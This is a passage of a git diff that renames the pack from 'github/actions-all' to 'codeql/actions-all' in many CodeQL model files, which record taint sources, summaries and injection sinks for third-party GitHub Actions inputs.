extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml index 412db371965..646d54ac92a 100644 --- a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml +++ b/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devorbitus/yq-action-output", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml index 4bc7e251808..f316799fa4a 100644 --- a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml index 845ae1770ed..116c231c30a 100644 --- a/ql/lib/ext/manual/docker_build-push-action.model.yml +++ b/ql/lib/ext/manual/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml index 226a151daba..a60f1cc9fb1 100644 --- a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml +++ b/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["dsfx3d/action-extract-unique-matches", "*", "input.text", "output.matches", "taint", "manual"] diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml index 8cdcabb2c11..eafb7d1fc3a 100644 --- a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml +++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml index 780acdb98ff..b4aab55179b 100644 --- a/ql/lib/ext/manual/endbug_latest-tag.model.yml +++ b/ql/lib/ext/manual/endbug_latest-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml index 038f1639d3c..3b7b4aea713 100644 --- a/ql/lib/ext/manual/expo_expo-github-action.model.yml +++ b/ql/lib/ext/manual/expo_expo-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml index d948bda8bf4..b09bec4a1d4 100644 --- a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml index ed9eeb6b252..cb71f958365 100644 --- a/ql/lib/ext/manual/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/manual/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml index f6441133c7a..c4f8a3efe3e 100644 --- a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml index 357ffc1c94a..aa9dd509661 100644 --- a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml index 0288103fd0a..767c77310e8 100644 --- a/ql/lib/ext/manual/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/manual/game-ci_unity-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml index 05dca2f8262..6df70ae927a 100644 --- a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml index 123dabe450e..3f43f195f68 100644 --- a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml index cb127c7ff46..3c63d7b845f 100644 --- a/ql/lib/ext/manual/getsentry_action-release.model.yml +++ b/ql/lib/ext/manual/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml index 79936a51520..6db033ebd9f 100644 --- a/ql/lib/ext/manual/github_codeql-action.model.yml +++ b/ql/lib/ext/manual/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml index 9bc26169b27..a376aefd6f6 100644 --- a/ql/lib/ext/manual/go-semantic-release_action.model.yml +++ b/ql/lib/ext/manual/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml index 8aa19f94452..51ca0af21c3 100644 --- a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml index dc86b19a69b..28d118e6b61 100644 --- a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml index bc9f2aad14c..7e045f8380a 100644 --- a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml index f288c615a35..2a6d3fac1df 100644 --- a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml index c3604795c25..a3c590ec473 100644 --- a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml index dfcc204c2ba..98a61516c60 100644 --- a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml index c8d5e822c02..17aaecf80c5 100644 --- a/ql/lib/ext/manual/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/manual/haya14busa_action-cond.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml index 5c7ec5f957f..60a68ed2f8d 100644 --- a/ql/lib/ext/manual/hexlet_project-action.model.yml +++ b/ql/lib/ext/manual/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml index 5384571801c..3c0820b6878 100644 --- a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml index ba5de742701..99146ff21be 100644 --- a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml index ce0fb573493..7790454a934 100644 --- a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml index 8f53dfeb118..e3cea2e555a 100644 --- a/ql/lib/ext/manual/iterative_setup-cml.model.yml +++ b/ql/lib/ext/manual/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml index 6d7d368c781..c3346d68945 100644 --- a/ql/lib/ext/manual/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/manual/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml index 9b0f078d874..2e2c0cff0ef 100644 --- a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml index dabec4e8d21..97b631cdfcd 100644 --- a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml index 2db040a0709..c6d3c5cfb48 100644 --- a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml index e8d4aa790a6..697189cfbd0 100644 --- a/ql/lib/ext/manual/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/manual/jsdaniell_create-json.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml index 3a5cf8c8be2..7f82a8b74f5 100644 --- a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml +++ b/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/jsmith/changes-since-last-tag diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml index 8fde3e0c110..95bd63fb22e 100644 --- a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml index e9b04f2806f..1fc8b037530 100644 --- a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml index 3e646e4482f..40b8b093957 100644 --- a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml +++ b/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml index 0d4df5ef6b1..0c3cf006d3e 100644 --- a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/karpikpl/list-changed-files-action diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml index 386baaf2f95..e61008f160e 100644 --- a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml index 5e7374dabad..96e4e8f02f5 100644 --- a/ql/lib/ext/manual/knu_changed-files.model.yml +++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/knu/changed-files diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml index d9c7d33c86f..feff62d16c0 100644 --- a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml index 016a8ebc8cf..b74e721e577 100644 --- a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml index d358aa23893..d59a122a53f 100644 --- a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml index a437dc2c4f2..8e108765b40 100644 --- a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml +++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml index f37bcbd6297..6f66e6cf867 100644 --- a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml index c7474549fcb..acdc250e353 100644 --- a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml +++ b/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml index 05acda9aac9..69298631c6e 100644 --- a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml index 4b0c810d230..85631268af7 100644 --- a/ql/lib/ext/manual/magefile_mage-action.model.yml +++ b/ql/lib/ext/manual/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml index acdf3ead4a4..18dbcab6f53 100644 --- a/ql/lib/ext/manual/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/manual/maierj_fastlane-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml index b138d59c57e..5c3b4b82bc2 100644 --- a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml index 63b236f32ad..d86870f2f15 100644 --- a/ql/lib/ext/manual/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/manual/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml index 9d0ecf04c6b..06b1f3afd5d 100644 --- a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/martinhaintz/ga-file-list diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml index 0c6debc5d5e..1d0e33bb277 100644 --- a/ql/lib/ext/manual/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/manual/mattdavis0351_actions.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml index b72bd69e625..f08bf9ac6e0 100644 --- a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml index fec2376377e..4e0800281d2 100644 --- a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml index 3201ac370b4..4ea7e022cbd 100644 --- a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/ql/lib/ext/manual/mikefarah_yq.model.yml index 35aecbdd968..b16fa3c545b 